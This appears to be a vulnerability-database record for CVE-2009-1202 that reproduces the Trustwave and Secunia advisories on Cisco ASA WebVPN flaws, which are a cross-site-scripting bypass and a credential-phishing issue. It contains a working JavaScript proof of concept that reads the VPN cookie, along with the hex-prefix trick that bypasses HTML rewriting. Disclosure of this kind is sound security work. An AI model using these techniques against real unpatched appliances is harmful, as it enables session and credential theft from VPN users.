ID

VAR-200906-0069

CVE

CVE-2009-1202

TITLE

Cisco Adaptive Security Appliances (ASA) Device WebVPN Vulnerable to cross-site scripting

DESCRIPTION

WebVPN on the Cisco Adaptive Security Appliances (ASA) device with software 8.0(4), 8.1.2, and 8.2.1 allows remote attackers to bypass certain protection mechanisms involving URL rewriting and HTML rewriting, and conduct cross-site scripting (XSS) attacks, by modifying the first hex-encoded character in a /+CSCO+ URI, aka Bug ID CSCsy80705. Cisco ASA is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass HTML rewrite rules. Successfully exploiting this issue will aid in cross-site scripting attacks. This issue is documented by Cisco Bug ID CSCsy80705. Cisco ASA 8.0.(4), 8.1.2, and 8.2.1 are vulnerable. Trustwave's SpiderLabs Security Advisory TWSL2009-002: Cisco ASA Web VPN Multiple Vulnerabilities Published: 2009-06-24 Version: 1.0 Vendor: Cisco Systems, Inc. (http://www.cisco.com) Versions affected: 8.0(4), 8.1.2, and 8.2.1 Description: Cisco's Adaptive Security Appliance (ASA) provides a number of security related features, including "Web VPN" functionality that allows authenticated users to access a variety of content through a web interface. This includes other web content, FTP servers, and CIFS file servers. The web content is proxied by the ASA and rewritten so that any URLs in the web content are passed as query parameters sent to the ASA web interface. Where scripting content is present, the ASA places a JavaScript wrapper around the original webpage's Document Object Model (DOM), to prevent the webpage from accessing the ASA's DOM. For example, the "csco_wrap_js" JavaScript function in /+CSCOL+/cte.js makes a call to a function referenced by "CSCO_WebVPN['process']". The result of this call is then used in an "eval" statement. function csco_wrap_js(str) { var ret="<script id=CSCO_GHOST src="+CSCO_Gateway+ "/+CSCOL+/cte.js></scr"+ "ipt><script id=CSCO_GHOST src="+ CSCO_Gateway+"/+CSCOE+/apcf></sc"+"ript>"; var js_mangled=CSCO_WebVPN['process']('js',str); ret+=CSCO_WebVPN['process']('html',eval(js_mangled)); return ret; }; To exploit this behavior, a malicious page can rewrite "CSCO_WebVPN['process']" with an attacker-defined function that will return an arbitrary value. The next time the "csco_wrap_js" function is called, the malicious code will be executed. Below is a proof of concept. <html><script> function a(b, c) { return "alert('Your VPN location:\\n\\n'+" + "document.location+'\\n\\n\\n\\n\\n" + "Your VPN cookie:\\n\\n'+document.cookie);"; } CSCO_WebVPN['process'] = a; csco_wrap_js(''); </script></html> Vendor Response: This vulnerability has been corrected in versions 8.0.4.34, and 8.1.2.25. CVSS Score: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C Base: 4.3 Temporal: 3.9 Finding 2: HTML Rewriting Bypass CVE: CVE-2009-1202 When a webpage is requested through the ASA's Web VPN, the targeted scheme and hostname is Rot13-encoded, then hex-encoded and placed in the ASA's URL. For example, "http://www.trustwave.com" is accessed by requesting the following ASA path: /+CSCO+0075676763663A2F2F6A6A6A2E67656866676A6E69722E70627A+ +/ The HTML content of this request is obviously reformatted by the ASA, starting at the very beginning: <script id='CSCO_GHOST' src="/+webvpn+/toolbar.js"> However, if the request URL is modified to change the initial hex value of "00" to "01", the HTML document is returned without any rewriting. This allows the pages scriptable content to run in the ASA's DOM, making Cross-Site Scripting trivial. Vendor Response: This vulnerability has been corrected in versions 8.0.4.34, and 8.1.2.25. CVSS Score: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C Base: 4.3 Temporal: 3.9 Finding 3: Authentication Credential Theft CVE: CVE-2009-1203 When a user accesses an FTP or CIFS destination using the Web VPN, the resulting URL is formatted in a similar manner as the web requests described above. The following URL attempts to connect to ftp.example.com; normally, it would be in an HTML frame within the Web VPN website. /+CSCOE+/files/browse.html?code=init&path=ftp%3A%2F%2F736763 2e726b6e7a6379722e70627a The ASA first attempts to connect to the FTP server or CIFS share using anonymous credentials. If those fail, the user is prompted for login credentials. When viewed on its own (outside of a frame), the submission form gives no indication what it is for and is very similar in appearance to the Web VPN's primary login page. If the URL was sent to a user by an attacker, it is very possible that a user would assume that he needs to resubmit credentials to the Web VPN. The ASA would then forward the credentials to the attacker's FTP or CIFS server. Vendor Response: This vulnerability has been corrected in versions 8.0.4.34, and 8.1.2.25. CVSS Score: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C Base: 4.3 Temporal: 3.9 Vendor Communication Timeline: 03/31/09 - Cisco notified of vulnerabilities 06/24/09 - Cisco software updates released; Advisory released Remediation Steps: Install updated software from Cisco. Revision History: 1.0 Initial publication About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs is the advance security team at Trustwave responsible for incident response and forensics, ethical hacking and application security tests for Trustwave's clients. SpiderLabs has responded to hundreds of security incidents, performed thousands of ethical hacking exercises and tested the security of hundreds of business applications for Fortune 500 organizations. For more information visit https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . ---------------------------------------------------------------------- Do you have VARM strategy implemented? (Vulnerability Assessment Remediation Management) If not, then implement it through the most reliable vulnerability intelligence source on the market. Implement it through Secunia. For more information visit: http://secunia.com/advisories/business_solutions/ Alternatively request a call from a Secunia representative today to discuss how we can help you with our capabilities contact us at: sales@secunia.com ---------------------------------------------------------------------- TITLE: Cisco ASA WebVPN Multiple Vulnerabilities SECUNIA ADVISORY ID: SA35511 VERIFY ADVISORY: http://secunia.com/advisories/35511/ DESCRIPTION: Some vulnerabilities and a security issue have been reported in Cisco Adaptive Security Appliance (ASA), which can be exploited by malicious people to conduct cross-site scripting and spoofing attacks. 1) Input passed within web pages is not properly sanitised before being used in a call to eval() in context of the VPN web portal. This can be exploited to execute arbitrary HTML and script code in user's browser session in context of the WebVPN. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of the VPN web portal. 3) A security issue exists in the handling of Common Internet File System (CIFS) and FTP shares in the SSL VPN feature. This can be exploited to conduct spoofing attacks and potentially disclose the user's credentials if a user follows a specially crafted link. The vulnerabilities are reported in versions prior to 8.0.4(34), 8.1.2(25), and 8.2.1(3) that are configured to accept Clientless SSL VPN connections. SOLUTION: Update to version 8.0.4(34), 8.1.2(25), or 8.2.1(3). http://www.cisco.com/pcgi-bin/tablebuild.pl/ASAPSIRT PROVIDED AND/OR DISCOVERED BY: David Byrne, Trustwave's SpiderLabs ORIGINAL ADVISORY: Cisco: http://tools.cisco.com/security/center/viewAlert.x?alertId=18373 http://tools.cisco.com/security/center/viewAlert.x?alertId=18442 http://tools.cisco.com/security/center/viewAlert.x?alertId=18536 Trustwave: https://www.trustwave.com/spiderlabs/advisories/TWSL2009-002.txt ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

AFFECTED PRODUCTS

CVSS

PROBLEMTYPE DATA

THREAT TYPE

remote

TYPE

xss

CONFIGURATIONS

PATCH

EXTERNAL IDS

REFERENCES

CREDITS

David Byrne davidribyrne@yahoo.com

SOURCES

LAST UPDATE DATE

2024-11-23T22:43:03.300000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE